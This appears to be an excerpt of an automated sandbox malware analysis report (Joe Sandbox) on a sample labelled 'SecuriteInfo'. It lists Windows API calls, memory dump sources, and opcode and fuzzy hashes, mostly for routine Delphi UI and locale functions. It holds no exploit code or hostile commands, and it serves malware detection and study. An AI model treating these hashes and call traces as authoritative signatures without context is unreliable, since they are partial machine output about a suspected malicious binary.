                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                            • Opcode ID: e238dc73e555493e425de5acd9016b1a16de49bd440931b03b4913a020b57395
                                                                                                                                            • Instruction ID: 9aa4be9c21d6a136c252360dfff719b09ee799b1cef457bf67173c54f3f7a331
                                                                                                                                            • Opcode Fuzzy Hash: e238dc73e555493e425de5acd9016b1a16de49bd440931b03b4913a020b57395
                                                                                                                                            • Instruction Fuzzy Hash: B3417FB2D00659AFDB10DAE8CC88BDEB7BDAF88300F4585A5E559E7241D7709A40DF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LoadString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                            • Opcode ID: 60205ef879891e590670d3496db15ee3f4ea2d322f82c3311d61b3e33959e64d
                                                                                                                                            • Instruction ID: 5ebd5f4d4f07219634a0c3e714140818157f07c5372ada9ae7e146579135e379
                                                                                                                                            • Opcode Fuzzy Hash: 60205ef879891e590670d3496db15ee3f4ea2d322f82c3311d61b3e33959e64d
                                                                                                                                            • Instruction Fuzzy Hash: 8C023C31A44254EFDB10DBACCA84BAD77F6AB44310F1645A1E908EB2A2DF35EE45DF40
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029D5EF8
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029D5F05
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029D5F0B
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029D5F36
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5F7D
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5F8D
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029D5FB5
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029D5FC5
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029D5FEB
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029D5FFB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                            • Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                                                            • Instruction ID: cc71b93e5ec36b1325a19019364ac91f6cd4130aba274a27b770f715979413f1
                                                                                                                                            • Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                                                            • Instruction Fuzzy Hash: C1318772E0025C6EEB25DAB8EC46FEF77AD9B44340F4481E19648E7181DB748E84DF90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsIconic.USER32(?), ref: 02A1225B
                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 02A12278
                                                                                                                                            • GetWindowRect.USER32(?), ref: 02A12291
                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02A1229F
                                                                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 02A122B4
                                                                                                                                            • ScreenToClient.USER32(00000000), ref: 02A122C1
                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 02A122CC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                            • String ID: ,
                                                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                                                            • Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                            • Instruction ID: 812edd54d931e63dcf1fc5a89075167bac5b41ccf71e96547edf9e322e55f8e5
                                                                                                                                            • Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                            • Instruction Fuzzy Hash: C9112E71504351AFCB10DFACC9C4A8BB7E9AF89310F048A65BE58DB296DB31D8048B61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SaveDC.GDI32(?), ref: 02A040D0
                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 02A04144
                                                                                                                                            • GetWindowDC.USER32(?,00000000,02A04334), ref: 02A041BE
                                                                                                                                            • SaveDC.GDI32(?), ref: 02A041F5
                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 02A04262
                                                                                                                                            • DefWindowProcA.USER32(?,?,?,?,00000000,02A04334), ref: 02A04316
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: RestoreSaveWindow$Proc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1975259465-0
                                                                                                                                            • Opcode ID: 2c9aa75b91e5ab076232344f40d38deb7ca9727359efe34af097fff544a25e61
                                                                                                                                            • Instruction ID: abef190e84a39f8fc8dd99d80ea198101701b6ec6f97dde4747ff2f4de66b3c1
                                                                                                                                            • Opcode Fuzzy Hash: 2c9aa75b91e5ab076232344f40d38deb7ca9727359efe34af097fff544a25e61
                                                                                                                                            • Instruction Fuzzy Hash: 5CE10734A046059BDB10DFA9E9C49AEF7F6FF9C300B1586A5EA01A72A0CB34ED41CF51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: RestoreSave$FocusWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1553564791-0
                                                                                                                                            • Opcode ID: 3798692132c9ef391b16150f88aa6a991260356e36c6952c0ebaa3e20afa1de5
                                                                                                                                            • Instruction ID: ce23f97139aa2eb106fd09534aebd19251d13802605ef4bd376ade867f09b2c0
                                                                                                                                            • Opcode Fuzzy Hash: 3798692132c9ef391b16150f88aa6a991260356e36c6952c0ebaa3e20afa1de5
                                                                                                                                            • Instruction Fuzzy Hash: 0EC15A31B80104EFCB14DB68D995ABEB3F7AB48334F1544A2E804AB294DF30EE41DB56
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsIconic.USER32(?), ref: 02A23998
                                                                                                                                            • SetActiveWindow.USER32(?,?,?,?,02A23392,00000000,02A23866), ref: 02A239A9
                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 02A239CC
                                                                                                                                            • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,02A23392,00000000,02A23866), ref: 02A239E5
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,02A23392,00000000,02A23866), ref: 02A23A2B
                                                                                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,02A23392,00000000,02A23866), ref: 02A23A79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ActiveEnabledFocusIconicProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 848842217-0
                                                                                                                                            • Opcode ID: 729cb8341e4ced4178828a2c799a23bc294c69fb114a385391de6376fa371b73
                                                                                                                                            • Instruction ID: c4eb7dafe1db6890bc560d25a96d0eb9be17504f585077fb5be9c88741722226
                                                                                                                                            • Opcode Fuzzy Hash: 729cb8341e4ced4178828a2c799a23bc294c69fb114a385391de6376fa371b73
                                                                                                                                            • Instruction Fuzzy Hash: 773141707402509BEF24AB6CCEC5BA937A9AF46704F0844F1EE04DF296CF79E8488B14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsIconic.USER32(?), ref: 02A1195F
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 02A1197D
                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 02A119B3
                                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 02A119D7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                                            • String ID: ,
                                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                                            • Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                                                            • Instruction ID: 8897da04a72fe805c756cf069314899d5df9d2c5787ef8342c227f3ed45d3a13
                                                                                                                                            • Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                                                            • Instruction Fuzzy Hash: EF212F716002149BCF14EFA9D9C0ADEB7A9AF49324F008465FE28DF246DB71E905CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsIconic.USER32(?), ref: 02A238D3
                                                                                                                                            • SetActiveWindow.USER32(?,?,?,02A23385,00000000,02A23866), ref: 02A238EB
                                                                                                                                              • Part of subcall function 02A22F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 02A22F82
                                                                                                                                              • Part of subcall function 02A22F58: ShowOwnedPopups.USER32(00000000,?), ref: 02A22FB1
                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 02A23917
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02A23385,00000000,02A23866), ref: 02A2394A
                                                                                                                                            • DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,02A23385), ref: 02A2395F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2995439034-0
                                                                                                                                            • Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                                                            • Instruction ID: b4aa17bac5972095d54c749539a7ae2d1ab86d8f9ee6a82c2afd0c3810871ab8
                                                                                                                                            • Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                                                            • Instruction Fuzzy Hash: E711FE707402109BDF54EF6DCEC5B9977AAAF45304F0840A5BE04EF19ADB79D8449F10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc
                                                                                                                                            • String ID: MonitorFromWindow
                                                                                                                                            • API String ID: 190572456-2842599566
                                                                                                                                            • Opcode ID: 8f217607c4b361a66789ab67a80147f82ba4dda35719bc1f39190e20dd767a2a
                                                                                                                                            • Instruction ID: 3ab4b3a8dcbe98ea0903a0f4e8e6991e18d27cf1782d9a028fc82024cf0252eb
                                                                                                                                            • Opcode Fuzzy Hash: 8f217607c4b361a66789ab67a80147f82ba4dda35719bc1f39190e20dd767a2a
                                                                                                                                            • Instruction Fuzzy Hash: 9A01A9729401185B87C0EA94DC849FFB39DDF45310B844822FA58E7241EF34DD12D7E5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $c
                                                                                                                                            • API String ID: 0-3797896886
                                                                                                                                            • Opcode ID: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
                                                                                                                                            • Instruction ID: ec7cd0b20941313e672ee21e32b016b4b36928f1326cf85394533cdf69ebb358
                                                                                                                                            • Opcode Fuzzy Hash: b967fa5f2c03492c02a443886e67412a232a1d2e3eeeb79c24c99ec0061bd16b
                                                                                                                                            • Instruction Fuzzy Hash: 92230030940314AFDB31DF68CD80BBEB7B6AF85704F44855AE90966285DF74EA84CF25
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A22468
                                                                                                                                            • GetCursorPos.USER32(?), ref: 02A22485
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 02A224A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1359611202-0
                                                                                                                                            • Opcode ID: b92f98a9c018601bfe18c996d78c31ce5b385205acf9cc2f5e59c13bdf51432c
                                                                                                                                            • Instruction ID: 72c966eb4cdb390a16fe65e1cc69e5ab2816d372f3cbb06a184f10f924cbbf62
                                                                                                                                            • Opcode Fuzzy Hash: b92f98a9c018601bfe18c996d78c31ce5b385205acf9cc2f5e59c13bdf51432c
                                                                                                                                            • Instruction Fuzzy Hash: BCF08C31584218DBEB24FBACF9C9B9973FDEB00310F408962E910DA1D2EF75A488DA15
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ($($(((
                                                                                                                                            • API String ID: 0-2102698497
                                                                                                                                            • Opcode ID: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
                                                                                                                                            • Instruction ID: 2bc093c569f31d9544b2902f3d87a41de2f7df2708c3167e329d6c4af8c74a91
                                                                                                                                            • Opcode Fuzzy Hash: 70f26961da04983359bca1248e5d54bef9d1d0e3906da48a8b51b758dccf3dc3
                                                                                                                                            • Instruction Fuzzy Hash: 54E1C030A44116AFEB18DF69CD84B7B77A7DFC5320F14C269E815AB2C9DE349911CAA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $@
                                                                                                                                            • API String ID: 0-1077428164
                                                                                                                                            • Opcode ID: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
                                                                                                                                            • Instruction ID: 338df66387d49cecdf695d6a019ef8505de7456f516636bca1996c8e0d7ddb0f
                                                                                                                                            • Opcode Fuzzy Hash: ef220ad4fc2a88b6fdae843f46c214da83f6911c8539a88788760522f9eb5a8f
                                                                                                                                            • Instruction Fuzzy Hash: CD722D70A80725AAEB319F64CE86FAF36A7EF85318F044866FD01A94D6DF74C501CA35
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetMessagePos.USER32 ref: 02A0F14F
                                                                                                                                            • GetKeyboardState.USER32(?,?,?,?,02A0F6C4), ref: 02A0F24C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: KeyboardMessageState
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3083355189-0
                                                                                                                                            • Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                                                            • Instruction ID: 7ce77e96aa40bf72970552506c8ca525f14b1c738ba0d7a852c9f110f158eb79
                                                                                                                                            • Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                                                            • Instruction Fuzzy Hash: BD318D755083419EC338DF78E5C579ABBE5AB8D314F004A2DE998E2A80EF74C904CB96
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CaptureIconic
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2277910766-0
                                                                                                                                            • Opcode ID: a8f87af678ed1b0e06f0ca06604030712470c8c3227d9b7e5dbfd9900ce2a7c0
                                                                                                                                            • Instruction ID: cc96760d6c7d41c90a8048bfac7891949ffab7ea57cc7470570e047b95f8d1f2
                                                                                                                                            • Opcode Fuzzy Hash: a8f87af678ed1b0e06f0ca06604030712470c8c3227d9b7e5dbfd9900ce2a7c0
                                                                                                                                            • Instruction Fuzzy Hash: F9116035F042099F9B20DB68C6D4AA9B3EAAF04324F144475E508EF351EF71ED409B90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,029F34F4), ref: 029F3478
                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,029F34F4), ref: 029F349E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                            • Opcode ID: 69a026fb5a83c92fde96dd4e576e3f3653caa3638f18df487680215a2e83a1b4
                                                                                                                                            • Instruction ID: d82aa3febe24a92116b0fc8793b7d70ce37e8e511bea51d575e257f66176aed4
                                                                                                                                            • Opcode Fuzzy Hash: 69a026fb5a83c92fde96dd4e576e3f3653caa3638f18df487680215a2e83a1b4
                                                                                                                                            • Instruction Fuzzy Hash: 1A01A7707442455BE7A2EB70CC81BE973ADEB98704F8180F5EB48E76C0EBB859808E14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
